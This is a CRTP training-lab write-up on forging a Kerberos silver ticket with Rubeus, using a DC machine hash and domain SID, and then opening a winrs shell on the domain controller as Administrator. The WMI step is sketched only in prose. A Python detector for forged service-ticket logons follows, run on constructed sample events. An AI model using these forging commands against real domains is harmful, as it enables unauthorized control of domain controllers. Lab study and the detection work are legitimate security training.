CRTP Lab 9
Task 1
Try to get command execution on the domain controller by creating a silver ticket for:
HTTP
WMI
Use the NTLM or AES hash of dcorp-dc to forge and import the ticket:
Here, we use Rubeus for HTTP service.
# ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Since the ticket is imported, we can get a shell on the DC and execute commands.
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
C:\Users\Administrator>set username
set username
USERNAME=Administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
Let's also use SafetyKatz for WMI.
To access WMI, we need two tickets, one for HOST and another for RPCSS.
Let's get one for HOST first:
Now for RPCSS:
We can now check whether the tickets are imported using klist.
We can now run WMI commands on DC.
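A defender's counterpart to this lab, added here as an example and not part of the CRTP material: a forged service ticket is built offline from the service account's key and never passes through the KDC, so the DC records the resulting 4624 Kerberos network logon without any preceding 4769 service-ticket request for that user. The events below are constructed, and the field names are simplified stand-ins for the Security log XML; in a multi-DC domain the 4769 events must be collected from every DC, since another KDC may have issued a legitimate ticket.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs) as they would appear on the DC:
# 4769 = Kerberos service ticket requested (logged by the KDC)
# 4624 = account logon; LogonType 3 with the Kerberos package is a
#        network logon authenticated with a service ticket.
SAMPLE_EVENTS = [
    {"id": 4769, "time": "2024-01-10T09:00:00", "user": "jdoe", "service": "DCORP-DC$"},
    {"id": 4624, "time": "2024-01-10T09:00:05", "user": "jdoe", "logon_type": 3, "package": "Kerberos"},
    # Kerberos network logon for which the KDC never issued a service ticket
    {"id": 4624, "time": "2024-01-10T09:30:00", "user": "Administrator", "logon_type": 3, "package": "Kerberos"},
    # NTLM logon: not a Kerberos ticket, so outside the scope of this check
    {"id": 4624, "time": "2024-01-10T09:31:00", "user": "svc", "logon_type": 3, "package": "NTLM"},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def find_unrequested_service_logons(events, max_ticket_age=timedelta(hours=10)):
    """Return (user, time) for every 4624 Kerberos network logon that has no
    4769 request for the same user within max_ticket_age before it.

    The default window equals the default service ticket lifetime, so a
    legitimate but cached ticket is not reported as forged.
    """
    tgs_requests = {}
    for event in events:
        if event["id"] == 4769:
            tgs_requests.setdefault(event["user"].lower(), []).append(parse_time(event["time"]))

    suspicious = []
    for event in events:
        if event["id"] != 4624 or event.get("logon_type") != 3 or event.get("package") != "Kerberos":
            continue
        logon_time = parse_time(event["time"])
        earlier_requests = tgs_requests.get(event["user"].lower(), [])
        # A matching 4769 must exist at or before the logon, inside the ticket lifetime
        if not any(logon_time - max_ticket_age <= req <= logon_time for req in earlier_requests):
            suspicious.append((event["user"], event["time"]))
    return suspicious


if __name__ == "__main__":
    for user, when in find_unrequested_service_logons(SAMPLE_EVENTS):
        print(f"Kerberos logon without KDC ticket request: {user} at {when}")
```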